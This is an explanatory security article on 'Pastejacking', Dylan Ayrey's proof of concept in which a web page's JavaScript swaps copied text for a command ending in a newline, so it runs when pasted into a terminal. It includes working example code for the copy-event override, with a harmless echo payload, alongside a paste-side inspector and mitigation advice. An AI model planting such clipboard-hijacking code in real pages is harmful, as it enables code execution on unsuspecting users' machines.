A proof-of-concept (PoC) developed by Ayrey shows the threat posed by a Pastejacking attack when a user pastes commands copied from a web page into a terminal. In the example, the victim is led to believe they are copying echo "not evil", when the string that actually lands on the clipboard is echo "evil"\n.
It’s worth noting that Ayrey’s PoC only triggers when the text is copied with a keyboard shortcut, because it hooks the key event rather than the copy action itself; copying via the context menu is unaffected. From the attacker’s point of view, however, the malicious content is placed on the clipboard regardless of which piece of text the victim selects on the PoC page.
The trailing \n (newline) character makes the terminal execute the command the moment it is pasted, without the user having to press Enter/Return. The victim therefore never gets a chance to inspect what they are pasting before it runs.
What is different about this method compared with earlier clipboard tricks is that the clipboard can be rewritten after an event, or on a short timer following an event, and it is easier to place hex-encoded control characters into the clipboard, which can be used to exploit Vim (for example, an ESC byte followed by an ex command).
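As an added illustration (example code written for this page, not Ayrey’s PoC), the following JavaScript shows the modern form of the trick using the copy event, which, unlike a keyboard-shortcut hook, also fires for context-menu copies, together with a paste-side check of the kind some terminals implement: it flags newlines, ESC and other control characters before they reach a shell or editor. The function names, the constructed stand-in for the browser’s document object, and the sample commands are assumptions made for this example.

```javascript
// Added example, not Ayrey's code: a "copy" event override plus a paste-side
// inspector.  All names and sample strings here are constructed for the example.

// What the victim believes they are copying versus what the page injects.
const VISIBLE_COMMAND = 'echo "not evil"';
const INJECTED_COMMAND = 'echo "evil"';

// Build the attacker's clipboard payload.  The trailing "\n" makes a terminal
// run the injected command as soon as it is pasted, before the victim can look.
function craftPayload(injected) {
  return injected + '\n';
}

// Register a copy handler on the given document-like object.  The handler
// replaces the text/plain clipboard item with the payload and cancels the
// default action so the browser does not write the real selection afterwards.
function installPastejack(doc, payload) {
  doc.addEventListener('copy', function (e) {
    e.clipboardData.setData('text/plain', payload);
    e.preventDefault(); // without this the selection would win
  });
}

// Minimal stand-in for the browser's document and ClipboardEvent so the
// override can be exercised outside a browser.  Returns the text that would
// end up on the clipboard after the victim copies `selectedText`.
function simulateCopy(selectedText, payload) {
  const listeners = [];
  const fakeDoc = {
    addEventListener: (type, fn) => { if (type === 'copy') listeners.push(fn); },
  };
  installPastejack(fakeDoc, payload);

  const clipboard = { 'text/plain': selectedText }; // browser default: the selection
  let defaultPrevented = false;
  const event = {
    clipboardData: { setData: (mime, data) => { clipboard[mime] = data; } },
    preventDefault: () => { defaultPrevented = true; },
  };
  listeners.forEach((fn) => fn(event));
  return defaultPrevented ? clipboard['text/plain'] : selectedText;
}

// Paste-side check: report every character a terminal or editor would act on.
// LF/CR submit the line immediately, ESC (0x1b) can leave Vim insert mode or
// start a control sequence, and other C0 controls move the cursor or worse.
function inspectPaste(text) {
  const findings = [];
  for (let i = 0; i < text.length; i++) {
    const code = text.charCodeAt(i);
    if (code === 0x0a || code === 0x0d) {
      findings.push({ index: i, code, reason: 'line terminator: command would run on paste' });
    } else if (code === 0x1b) {
      findings.push({ index: i, code, reason: 'ESC: can change editor mode or start a control sequence' });
    } else if (code < 0x20 && code !== 0x09) {
      findings.push({ index: i, code, reason: 'control character' });
    }
  }
  return { safe: findings.length === 0, findings };
}

// In a real browser, arm the override on the page.  In Node there is no
// `document`, so this is skipped and the functions above can still be exercised.
if (typeof document !== 'undefined') {
  installPastejack(document, craftPayload(INJECTED_COMMAND));
} else {
  const landed = simulateCopy(VISIBLE_COMMAND, craftPayload(INJECTED_COMMAND));
  console.log('clipboard after copy:', JSON.stringify(landed));
  console.log('paste inspection:', JSON.stringify(inspectPaste(landed)));
}
```

The inspector is the piece worth carrying into a real workflow: a paste hook that refuses, or at least warns on, any clipboard text containing a line terminator or ESC catches both the plain echo "evil"\n case and the Vim-oriented control-character variant.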
The attack method does not work against Apple’s Safari browser, and some applications, such as the OS X terminal replacement iTerm and the Windows console emulator Cmder, show warnings when a command containing the newline character is about to be pasted.
Experts demonstrated several years ago that HTML/CSS tricks could be used to add arbitrary content to the clipboard without the user’s knowledge. However, the method detailed by developer and security expert Dylan Ayrey, dubbed “Pastejacking,” relies on JavaScript to accomplish the task.
“This method can be combined with a phishing attack to entice users into running seemingly innocent commands. The malicious code will override the innocent code, and the attacker can gain remote code execution on the user's host if the user pastes the contents into the terminal,” Ayrey said.
Users can reduce their exposure to Pastejacking by disabling JavaScript, but the most practical defense is caution when copying and pasting content from questionable sources: paste into a plain text editor first and read it, rather than pasting straight into a terminal.